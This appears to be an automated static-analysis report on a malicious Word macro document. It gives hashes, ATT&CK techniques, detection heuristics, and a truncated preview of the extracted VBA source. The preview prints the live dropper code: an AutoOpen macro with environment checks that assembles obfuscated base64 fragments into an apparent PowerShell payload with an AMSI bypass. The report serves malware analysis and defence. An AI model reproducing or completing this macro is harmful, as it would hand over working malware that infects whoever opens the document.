Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 47a79c33524e7786…

MALICIOUS

Office (OLE)

108.5 KB Created: 2018-03-19 16:38:00 Authoring application: Microsoft Office Word First seen: 2018-09-04
MD5: 4bd2fcee80df39054b21adbd5f5d96fa SHA-1: cc08674968d7858576da7d0198961e78f0a319de SHA-256: 47a79c33524e7786346210a50c43761fc852bdf9d84c643bf4dfd34e592df9d3
310 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32

The sample is a malicious Office document containing VBA macros. The document body presents a lure to "Enable Content" to view updated terms of service, a common social engineering tactic. The AutoOpen macro uses GetObject to interact with WMI and the Environ function to access environment variables. It also contains obfuscated code that likely attempts to download and execute a second-stage payload, potentially involving PowerShell and rundll32.exe.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6482566-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6482566-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://help.github.com/articles/github-terms-of-service-draft In document text (OLE body)
    • https://help.github.com/articles/github-terms-of-service/In document text (OLE body)
    • https://github.com/contact/terms-of-serviceIn document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 116142 bytes
SHA-256: 9e9a2c823783839f460d17848593bbc13ac3f5aa955e9654f0db1e0e0a18359c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "module1"
Sub AutoOpen()
On Error Resume Next
    Set ImogenPhotobiologic = GetObject("winmgmts:").Get("Win32_PingStatus.Address='location.microsoft.com',ResolveAddressNames=True")
    With ImogenPhotobiologic
        Debug.Print "Status Code: " & .StatusCode
        If .StatusCode = 0 Then
            EtzelUnpolishedness = False
        ElseIf .StatusCode > 0 Then
            EtzelUnpolishedness = False
        Else 'No DNS Resolution
            EtzelUnpolishedness = True
        End If
    End With
    
    Set ImogenPhotobiologic = GetObject("winmgmts:").Get("Win32_PingStatus.Address='" & Environ$("userdomain") & "',ResolveAddressNames=True")
    With ImogenPhotobiologic
        Debug.Print "Status Code: " & .StatusCode
        Debug.Print "Address: " & .Address
        If .StatusCode = 0 Then
            VeraPostmeridian = True
        ElseIf .StatusCode > 0 Then
            VeraPostmeridian = False
        Else 'No DNS Resolution
            VeraPostmeridian = False
        End If
    End With
    
    If EtzelUnpolishedness = True And VeraPostmeridian = True Then
    Dim UnstifflyGruesomest As String
    OutbowlTega = Array("w", "u", "o", "p", "e", "y", "b", "a", "t", "x", "-", "s", "d", "c", " ", "h", "r", "i", "n", "l")
    Dim LucierDruidism As String
    LucierDruidism = "SQBmACgAJ"
    Dim TetanineSpans As String
    TetanineSpans = "ABQAFMA"

    Dim ChancellorsvilleCalabresi As String
    ChancellorsvilleCalabresi = "VgBlAHIAcwB"


    Dim AutotomiesDemoniacally As String
    AutotomiesDemoniacally = "JAE8AbgBUAGEAYgBMAG"

    Dim ParcellingRubification As String
    ParcellingRubification = "UALgBQAFMAVgBlAFIAU"
    PreinsultDreck = PreinsultDreck & LucierDruidism & TetanineSpans & ChancellorsvilleCalabresi & AutotomiesDemoniacally & ParcellingRubification
    Dim StylizingAntebellum As String
    StylizingAntebellum = "wBpAE8ATgA"
    Dim MacroplanktonPostconvalescents As String
    MacroplanktonPostconvalescents = "uAE0AQQBKAE8AUgAg"

    Dim OrangoutanRelinquishments As String
    OrangoutanRelinquishments = "AC0ARwBFACAAMwApA"

    Dim LodesmanStet As String
    LodesmanStet = "HsAJABHAFAAR"


    Dim FlorianMesosome As String
    FlorianMesosome = "gA9AFsAcg"


    PreinsultDreck = PreinsultDreck & StylizingAntebellum & MacroplanktonPostconvalescents & OrangoutanRelinquishments & LodesmanStet & FlorianMesosome
    Dim SpoliatingUnindigent As String
    SpoliatingUnindigent = "BlAGYAXQAuAEEAUwBzA"
    UnstifflyGruesomest = UnstifflyGruesomest + OutbowlTega(3)
    UnstifflyGruesomest = UnstifflyGruesomest + OutbowlTega(2)
    Dim EmanationVelated As String
    EmanationVelated = "GUATQBi"


    Dim GeomorphicNontransient As String
    GeomorphicNontransient = "AEwAWQAuAEcARQB"


    Dim OratressPentad As String
    OratressPentad = "0AFQAeQBQAEUAKA"

    Dim CurrentnessDuecentist As String
    CurrentnessDuecentist = "AnAFMAeQBzAHQAZQBtAC4"
    PreinsultDreck = PreinsultDreck & SpoliatingUnindigent & EmanationVelated & GeomorphicNontransient & OratressPentad & CurrentnessDuecentist
    Dim ClyfakerCapercailye As String
    ClyfakerCapercailye = "ATQBhAG4AYQB"


    Dim SurveyalAiluroidea As String
    SurveyalAiluroidea = "nAGUAbQB"


    Dim PelecyopodaUnmeekly As String
    PelecyopodaUnmeekly = "lAG4AdAA"
    Dim OlusteeAinhum As String
    OlusteeAinhum = "uAEEAdQB0AG8Ab"


    Dim BimodulusOverpenalize As String
    BimodulusOverpenalize = "QBhAHQAaQBvAG4ALgBVAH"
    PreinsultDreck = PreinsultDreck & ClyfakerCapercailye & SurveyalAiluroidea & PelecyopodaUnmeekly & OlusteeAinhum & BimodulusOverpenalize
    Dim PororocaTrachypterus As String
    PororocaTrachypterus = "QAaQBsAHMAJw"
    Dim Anticonsume
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.